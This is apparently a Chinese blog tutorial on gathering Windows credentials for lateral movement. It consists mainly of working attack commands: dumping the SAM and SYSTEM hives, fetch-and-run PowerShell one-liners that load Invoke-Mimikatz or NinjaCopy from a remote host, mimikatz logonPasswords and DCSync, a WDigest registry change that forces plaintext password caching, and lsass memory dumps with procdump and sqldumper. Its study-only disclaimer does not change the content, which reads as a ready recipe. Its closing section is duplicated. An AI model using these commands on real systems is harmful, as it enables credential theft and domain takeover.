内网横向渗透之密码搜集

一、前言

由于本人是第一次写文章,算是对自己的知识进行梳理也算是炒冷饭了,欢迎大家的批评与建议。

本文仅用于技术讨论与研究,对于文中所有的工具以及命令,都是本人自行搭建的环境进行测试的。文中使用的技术仅用于学习教育目的,如果文中出现的技术用于其他任何目的及目标,作者概不负责。

二、常见的方法

1.抓取本地SAM文件中的密码 从注册表中导出

reg save HKLM\SYSTEM sys.hiv #获取SYSTEM注册表信息,导出为sys.hiv文件

reg save HKLM\SAM sam.hiv
#获取SAM注册表信息,导出为sam.hiv文件[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rYakJFuu-1690336611283)(https://image.3001.net/images/20210223/1614067076_6034b5848d40e66001ab5.png!small?1614067076832)]

2.还可以使用nihs_x0008_ng中的Invoke-NinjaCopy.ps1脚本导出

①导出SAM文件 Invoke-NinjaCopy -Path “C:\Windows\System32\con fig\SYSTEM”
-LocalDestination “C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-
NinjaCopy\sys.hiv”

②导出SYSTEM文件 Invoke-NinjaCopy -Path “C:\Windows\System32\conf ig\SAM”
-LocalDestination “C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-
NinjaCopy\sam.hiv”

Ninja-copy

在线加载: powershell -exec bypass “IEX (New-Object
Net.WebClient).DownloadString(‘http://ip/Invoke-NinjaCopy.ps1’);Invoke-
NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\SAM.txt;”

本地加载: powershell -exec bypass “Import-Module .\Invoke-NinjaCopy.ps1;Invoke-
NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination sam.hive”

利用empire里面的Invoke-PowerDump.ps1脚本,下载地址:
[https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-
PowerDump.ps1
](https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-
PowerDump.ps1)

从左到右依次是: 用户名 : Rid : ntlm : lm:::
Rid为500代表是管理员,504代表是guest账号等。lm跟ntlm的区别是加密方法的不同

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ylzuZLgy-1690336611285)(https://image.3001.net/images/20210223/1614071965_6034c89d7bceebc09b4c9.png!small)]

用mimikatz解密导出的两个文件

privilege::debug #提升权限

lsadump::sam /sam:sam.hiv /system:sys.hiv #mimikatz运行解密命令

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PjAvRChL-1690336611287)(https://image.3001.net/images/20210223/1614072056_6034c8f8aeac5d43c10bf.png!small?1614072057261)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VRIVdpdz-1690336611288)(https://image.3001.net/images/20210223/1614072046_6034c8ee0f67287a6a760.png!small?1614072046487)]

当我们没法使用交互式的命令时可以使用下面的命令导出

powershell “IEX (New-Object
Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-
Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds”

mimikatz

privilege::debug 提升权限

sekurlsa::logonPasswords 抓取密码

mimikatz.exe “privilege::debug” “sekurlsa::logonPasswords” “exit” > pass.txt

lsadump::sam /sam:Sam.hiv /system:System.hiv 导出用户hash

使用PowerShell Mimikatz

使用Mimikatz的DCSync 远程转储Active Directory凭证提取用户帐户的密码数据: Mimikatz
“privilege::debug” "lsadump::dcsync /domain:xxx /user:dbadmin"exit

管理员用户帐户提取密码数据:

Mimikatz “privilege::debug” “lsadump::dcsync /domain:xxx /user:Administrator”
exit

使用mimikatz.exe,执行ts::multirdp允许多用户远程登录

需要说明一下的是,当系统为win10或者win2012R2以上时,默认内存缓存中禁止保存明文密码,此时可以通过修改组测表的方式抓取明文,但是需要用户重新登陆后才能抓取成功。
命令如下:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 1 /f

当重启服务器的时候,我们重新加载mimikatz,就可以抓取密码。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-e4Rw1bGz-1690336611290)(https://image.3001.net/images/20210223/1614072342_6034ca16ef1ce103e745b.png!small?1614072343612)]

saminside

用saminside解密导出的两个文件 打开工具saminside导入sam与system文件 如图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hjHdymAi-1690336611291)(https://image.3001.net/images/20210223/1614072398_6034ca4e3536728ee4965.png!small?1614072398568)]

procdump+mimikatz

①把lsass进程文件拖回本地破解(因为直接上传会报杀)注意工具与目标系统位数要一致

procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp
#在目标机子执行导出为lsass.dmp,然后拖回本地

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JfkxfRrO-1690336611292)(https://image.3001.net/images/20210223/1614072445_6034ca7dc4f0f95fbc2d9.png!small?1614072446346)]

挂载lsass.dmp文件 sekurlsa::minidump lsass.dmp #挂载lsass.dmp

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wsi5F9CN-1690336611293)(https://image.3001.net/images/20210223/1614072461_6034ca8d86d4948146fd1.png!small?1614072461726)]

抓取lsass.dmp文件中的密码 log #会在目录下生成.log文件,方便查看 sekurlsa::logonpasswords
#mimikatz执行,在拖回的.dmp文件抓取密码

sqldumper+mimikatz

①首先查看lsass进程的PID tasklist /svc |findstr lsass.exe

②利用sqldumper转储 Sqldumper.exe 0 0x01100 #后面的数字是固定的,然后就会生成Sqlxxx.mdmp文件

③利用mimikatz抓取hash sekurlsa::minidump SQLDmpr0001.mdmp sekurlsa::logonPasswords

总结

希望大家多多批评指导,本人也是一个刚刚打开安全大门的弱鸡大家共同努力为网络安全添砖加瓦。

hash sekurlsa::minidump SQLDmpr0001.mdmp sekurlsa::logonPasswords

总结

希望大家多多批评指导,本人也是一个刚刚打开安全大门的弱鸡大家共同努力为网络安全添砖加瓦。

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZvUxwnsG-1690336611294)(https://picd.zhimg.com/80/v2-4f9b78990c8004842766b3e478b185b8_720w.png?source=d16d100b)]

第二阶段:Web渗透(初级网安工程师)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9mTCPglh-1690336611295)(https://picd.zhimg.com/80/v2-977cbb066f1236207ceff161b22edd0d_720w.png?source=d16d100b)]

第三阶段:进阶部分(中级网络安全工程师)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QsOSY63W-1690336611296)(https://picd.zhimg.com/80/v2-43f03949b09dcf75169640b7ede64fa2_720w.png?source=d16d100b)]

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GnfZ8m1t-1690336611297)(C:\Users\Administrator\Desktop\网络安全资料图\微信截图_20230201105953.png)]

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值